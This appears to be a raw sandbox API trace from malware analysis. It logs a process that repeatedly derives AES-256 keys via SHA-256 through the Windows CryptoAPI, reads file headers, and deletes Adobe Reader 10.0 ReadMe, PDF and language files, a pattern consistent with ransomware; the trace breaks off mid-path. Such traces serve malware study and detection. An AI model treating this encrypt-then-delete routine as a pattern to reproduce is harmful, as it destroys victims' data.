[0220.049] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.049] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3f71 [0220.050] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.053] CryptDestroyHash (hHash=0x284d628) returned 1 [0220.053] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.053] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.054] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm")) returned 1 [0220.055] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.056] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.056] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.056] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.056] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3fa1 [0220.056] ReadFile (in: hFile=0x5d4, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.064] CryptDestroyHash (hHash=0x284d528) returned 1 [0220.064] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.064] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.065] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm")) returned 1 [0220.067] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.068] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.068] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.068] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.068] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4623 [0220.068] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.074] CryptDestroyHash (hHash=0x284d628) returned 1 [0220.074] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.074] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.076] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm")) returned 1 [0220.078] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.078] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.078] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.078] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.079] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x42aa [0220.079] ReadFile (in: hFile=0x5d4, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.091] CryptDestroyHash (hHash=0x284d528) returned 1 [0220.092] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.092] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.093] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm")) returned 1 [0220.098] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.098] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.099] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.099] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.099] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4274 [0220.099] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.130] CryptDestroyHash (hHash=0x284d628) returned 1 [0220.130] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.130] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.132] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHUN.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehun.htm")) returned 1 [0220.134] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.134] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.135] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.135] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.135] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17b8 [0220.135] ReadFile (in: hFile=0x608, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.162] CryptDestroyHash (hHash=0x284d528) returned 1 [0220.162] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.162] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.163] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm")) returned 1 [0220.165] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.165] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.165] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.165] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.165] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4090 [0220.165] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.191] CryptDestroyHash (hHash=0x284d628) returned 1 [0220.191] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.191] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.192] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm")) returned 1 [0220.193] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.194] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.194] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.194] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.194] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4444 [0220.194] ReadFile (in: hFile=0x608, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.208] CryptDestroyHash (hHash=0x284d528) returned 1 [0220.208] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.208] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.210] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm")) returned 1 [0220.211] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.211] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.211] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.212] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.212] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4318 [0220.212] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.215] CryptDestroyHash (hHash=0x284d628) returned 1 [0220.215] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.215] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.216] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm")) returned 1 [0220.230] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.231] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.231] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.231] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.231] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4872 [0220.231] ReadFile (in: hFile=0x608, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.234] CryptDestroyHash (hHash=0x284d528) returned 1 [0220.234] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.234] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.236] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm")) returned 1 [0220.237] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.238] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.238] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.238] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.238] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x43b7 [0220.238] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.289] CryptDestroyHash (hHash=0x284d628) returned 1 [0220.289] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.289] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.290] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm")) returned 1 [0220.292] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0220.293] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0220.293] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.293] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0220.293] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4995 [0220.293] ReadFile (in: hFile=0x608, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0220.305] CryptDestroyHash (hHash=0x284d528) returned 1 [0220.305] CryptDestroyKey (hKey=0x284d568) returned 1 [0220.305] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.306] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm")) returned 1 [0220.316] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0220.332] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0220.335] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0220.341] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0220.341] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0220.341] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0220.341] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0220.342] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d9e [0220.342] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0220.449] CryptDestroyHash (hHash=0x284d568) returned 1 [0220.449] CryptDestroyKey (hKey=0x284d528) returned 1 [0220.449] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0220.450] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\enutxt.pdf")) returned 1 [0220.610] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0220.749] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0220.749] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0220.929] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0221.254] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.255] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.255] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.255] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.255] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c88 [0221.255] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.268] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.268] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.268] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.269] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar.txt")) returned 1 [0221.270] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.271] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.271] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.271] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.271] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c88 [0221.271] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.280] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.280] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.280] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.281] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_AE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ae.txt")) returned 1 [0221.283] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.283] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.283] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.283] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.283] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.284] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.322] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.322] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.322] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.324] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_BH.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_bh.txt")) returned 1 [0221.325] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.326] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.326] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.326] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.326] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.326] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.330] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.330] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.330] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.331] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_DZ.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_dz.txt")) returned 1 [0221.333] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.333] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.333] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.333] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.334] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.334] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.346] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.346] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.346] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.347] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_EG.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_eg.txt")) returned 1 [0221.349] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.349] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.350] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.350] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.350] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6c96 [0221.350] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.353] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.353] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.353] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.355] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IN.txt" (normalized: "c:\\program files 